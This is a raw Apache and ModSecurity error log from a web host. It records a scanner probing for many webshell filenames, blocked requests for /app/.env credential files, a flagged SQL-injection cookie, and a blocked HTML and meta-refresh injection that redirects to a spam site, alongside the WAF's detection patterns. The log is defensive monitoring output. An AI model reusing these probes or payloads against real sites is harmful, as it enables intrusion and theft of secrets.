[Tue May 12 04:18:55.165019 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/byp.php
[Tue May 12 04:18:55.257106 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/wp-trackback.php
[Tue May 12 04:18:55.349396 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/.well-known/index.php
[Tue May 12 04:18:55.627413 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/gmo.php
[Tue May 12 04:18:55.835960 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/css/index.php
[Tue May 12 04:18:56.671240 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/ww1.php
[Tue May 12 04:18:56.953198 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/.well-known/acme-challenge/index.php
[Tue May 12 04:18:57.144797 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/security.php
[Tue May 12 04:18:57.815042 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/.well-known/admin.php
[Tue May 12 04:18:58.187285 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/.well-known/log.php
[Tue May 12 04:18:58.281419 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/class.php
[Tue May 12 04:18:58.513203 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/bless5.php
[Tue May 12 04:18:58.803087 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/lock360.php
[Tue May 12 04:18:58.898093 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/f35.php
[Tue May 12 04:18:59.000400 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/ioxi-o1.php
[Tue May 12 04:18:59.101101 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/juuuu.php
[Tue May 12 04:18:59.222811 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/ha.php
[Tue May 12 04:18:59.317744 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/gg.php
[Tue May 12 04:18:59.413279 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/we2.php
[Tue May 12 04:18:59.508511 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/04.php
[Tue May 12 04:18:59.603754 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/333.php
[Tue May 12 04:18:59.699316 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/520.php
[Tue May 12 04:18:59.796559 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/ar.php
[Tue May 12 04:18:59.892964 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/x.php
[Tue May 12 04:18:59.988140 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/xx.php
[Tue May 12 04:19:00.082980 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/gifclass4.php
[Tue May 12 04:19:00.178600 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/2clas.php
[Tue May 12 04:19:00.276317 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/ave.php
[Tue May 12 04:19:00.371054 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/wrt.php
[Tue May 12 04:19:00.466118 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/bibil.php
[Tue May 12 04:19:00.561095 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/radio.php
[Tue May 12 04:19:00.657340 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/files.php
[Tue May 12 04:19:00.759121 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/file7.php
[Tue May 12 04:19:00.859860 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/gifclass.php
[Tue May 12 04:19:01.055632 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/nox.php
[Tue May 12 04:19:01.149716 2026] [security2:error] [pid 1730175:tid 1730201] [client 114.119.150.22:43599] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: 868eec3cfb8cb30decc25001a40de6cb||1778554139||1778553779"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/camping-port-grimaud/"] [unique_id "agKOFXo6NvB9WXx5V-6W6QAAARg"]
[Tue May 12 04:19:01.149947 2026] [security2:error] [pid 1730175:tid 1730201] [client 114.119.150.22:43599] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/camping-port-grimaud/"] [unique_id "agKOFXo6NvB9WXx5V-6W6QAAARg"]
[Tue May 12 04:19:01.153377 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/file48.php
[Tue May 12 04:19:01.250143 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/info.php
[Tue May 12 04:19:01.350739 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/class9.php
[Tue May 12 04:19:01.445948 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/la.php
[Tue May 12 04:19:01.540914 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/bless11.php
[Tue May 12 04:19:01.637029 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/ccou.php
[Tue May 12 04:19:01.732454 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/ton.php
[Tue May 12 04:19:01.797209 2026] [security2:error] [pid 1730175:tid 1730201] [client 114.119.150.22:43599] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKOFXo6NvB9WXx5V-6W6QAAARg"]
[Tue May 12 04:19:01.827740 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/403.php
[Tue May 12 04:19:01.922946 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/file9.php
[Tue May 12 04:19:02.025465 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/ac.php
[Tue May 12 04:19:02.120756 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/new4.php
[Tue May 12 04:19:02.215564 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/pop.php
[Tue May 12 04:19:02.312317 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/az.php
[Tue May 12 04:19:02.407700 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/xaz.php
[Tue May 12 04:19:02.503062 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/up4.php
[Tue May 12 04:19:02.598330 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/1aa.php
[Tue May 12 04:19:02.693514 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/elp.php
[Tue May 12 04:19:02.790420 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/wtz.php
[Tue May 12 04:19:02.911363 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/galex.php
[Tue May 12 04:19:03.006246 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/xb.php
[Tue May 12 04:19:03.101333 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/ova.php
[Tue May 12 04:19:03.196516 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/vx.php
[Tue May 12 04:19:03.291399 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/rh.php
[Tue May 12 04:19:03.386314 2026] [:error] [pid 1730175:tid 1730181] [client 20.151.0.198:29764] File does not exist: /home/nearoofr/public_html/webindex.php
[Tue May 12 04:19:12.933995 2026] [security2:error] [pid 1730207:tid 1730231] [client 49.51.183.220:37072] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/category/concert/punk/"] [unique_id "agKOIDue9Sp-pIv_Bb6tBAAAAVY"]
[Tue May 12 04:19:25.695543 2026] [security2:error] [pid 1730175:tid 1730182] [client 176.65.139.232:49868] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/app/.env"] [unique_id "agKOLXo6NvB9WXx5V-6XKQAAAQU"]
[Tue May 12 04:19:25.695764 2026] [security2:error] [pid 1730175:tid 1730182] [client 176.65.139.232:49868] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/.env"] [unique_id "agKOLXo6NvB9WXx5V-6XKQAAAQU"]
[Tue May 12 04:19:26.247904 2026] [security2:error] [pid 1730175:tid 1730182] [client 176.65.139.232:49868] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKOLXo6NvB9WXx5V-6XKQAAAQU"]
[Tue May 12 04:19:26.384195 2026] [security2:error] [pid 1707624:tid 1707686] [client 176.65.139.236:53290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/app/.env"] [unique_id "agKOLrOxS7i6i_mT2NLneQAAAEQ"]
[Tue May 12 04:19:26.384425 2026] [security2:error] [pid 1707624:tid 1707686] [client 176.65.139.236:53290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/.env"] [unique_id "agKOLrOxS7i6i_mT2NLneQAAAEQ"]
[Tue May 12 04:19:26.887826 2026] [security2:error] [pid 1707624:tid 1707686] [client 176.65.139.236:53290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKOLrOxS7i6i_mT2NLneQAAAEQ"]
[Tue May 12 04:19:53.354130 2026] [security2:error] [pid 1808852:tid 1808859] [client 170.106.197.109:42946] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOSRfeipD4uoG21FoZmAAAAAQ"]
[Tue May 12 04:19:59.340491 2026] [security2:error] [pid 1730207:tid 1730214] [client 176.65.139.235:35336] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "flb.labaujue.com"] [uri "/app/.env"] [unique_id "agKOTzue9Sp-pIv_Bb6tagAAAUU"]
[Tue May 12 04:19:59.340713 2026] [security2:error] [pid 1730207:tid 1730214] [client 176.65.139.235:35336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "flb.labaujue.com"] [uri "/app/.env"] [unique_id "agKOTzue9Sp-pIv_Bb6tagAAAUU"]
[Tue May 12 04:19:59.340950 2026] [security2:error] [pid 1730207:tid 1730214] [client 176.65.139.235:35336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "flb.labaujue.com"] [uri "/app/.env"] [unique_id "agKOTzue9Sp-pIv_Bb6tagAAAUU"]
[Tue May 12 04:20:45.500839 2026] [security2:error] [pid 1808852:tid 1808879] [client 43.131.32.36:54082] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/badinerie/"] [unique_id "agKOfRfeipD4uoG21FoZ3wAAABg"]
[Tue May 12 04:21:30.506547 2026] [security2:error] [pid 1808852:tid 1808868] [client 43.130.105.21:55352] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agKOqhfeipD4uoG21FoaagAAAA0"]
[Tue May 12 04:21:55.094618 2026] [security2:error] [pid 1707624:tid 1707698] [client 194.233.64.127:63562] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://notbig.ru/engine/redirect.php?url=http://rlu.ru/5fyxx>kampus di bandung</a><meta http-equiv=refresh content=0;url=http://notbig.ru/engine/redirect.php?url=http://rlu.ru/5fyxx />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOw7OxS7i6i_mT2NLotgAAAFA"]
[Tue May 12 04:21:55.096919 2026] [security2:error] [pid 1707624:tid 1707698] [client 194.233.64.127:63562] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX>kampus di bandung</a><meta http-equiv=refresh content=0;url=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX /> found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX>kampus di bandung</a><meta http-equiv=refresh content=0;url=http://Notbi..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOw7OxS7i6i_mT2NLotgAAAFA"]
[Tue May 12 04:21:55.097355 2026] [security2:error] [pid 1707624:tid 1707698] [client 194.233.64.127:63562] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX /> found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX>kampus di bandung</a><meta http-equiv=refresh content=0;url=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC- [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOw7OxS7i6i_mT2NLotgAAAFA"]
[Tue May 12 04:21:55.098492 2026] [security2:error] [pid 1707624:tid 1707698] [client 194.233.64.127:63562] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX>kampus di bandung</a><meta http-equiv=refresh content=0;url=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOw7OxS7i6i_mT2NLotgAAAFA"]
[Tue May 12 04:21:55.099411 2026] [security2:error] [pid 1707624:tid 1707698] [client 194.233.64.127:63562] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX>kampus di bandung</a><meta http-equiv=refresh content=0;url=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOw7OxS7i6i_mT2NLotgAAAFA"]
[Tue May 12 04:21:55.099826 2026] [security2:error] [pid 1707624:tid 1707698] [client 194.233.64.127:63562] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOw7OxS7i6i_mT2NLotgAAAFA"]
